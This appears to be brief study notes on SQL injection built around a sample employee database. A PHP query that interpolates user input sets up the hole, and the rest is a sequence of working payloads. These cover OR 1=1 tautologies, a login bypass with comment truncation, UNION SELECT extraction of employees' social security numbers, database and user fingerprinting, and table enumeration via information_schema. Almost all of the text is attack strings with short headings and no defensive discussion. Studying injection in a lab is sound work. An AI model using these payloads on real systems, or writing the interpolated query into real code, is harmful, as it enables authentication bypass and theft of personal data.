$query = "SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%$lname%'";



SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%Smith%'


SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%%' OR 1=1


SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%' OR 1=1%'


SELECT FNAME, LNAME FROM EMPLOYEE WHERE LNAME LIKE '%' OR 1=1 -- %'


Authentication depends on any result
SELECT UNAME, PASSWD FROM USERS WHERE UNAME = '%uname' AND PASSWD = '%pwd'


SELECT UNAME, PASSWD FROM USERS WHERE UNAME = '' AND PASSWD = '' OR 1=1 -- '

Get SSNs
' UNION SELECT LNAME, SSN FROM EMPLOYEE --

' AND 1=0 UNION SELECT LNAME, SSN FROM EMPLOYEE -- 

Fit 3 fields into 2 columns
' AND 1=0 UNION SELECT concat(FNAME, '  ', LNAME), SSN FROM EMPLOYEE -- 

Call functions in mysql
' AND 1=0 UNION SELECT user(), null FROM EMPLOYEE -- 

Fingerprint DB and OS
' AND 1=0 UNION SELECT version(), database() FROM EMPLOYEE -- 

Get tables names
' AND 1=0  UNION SELECT table_name, null from information_schema.tables --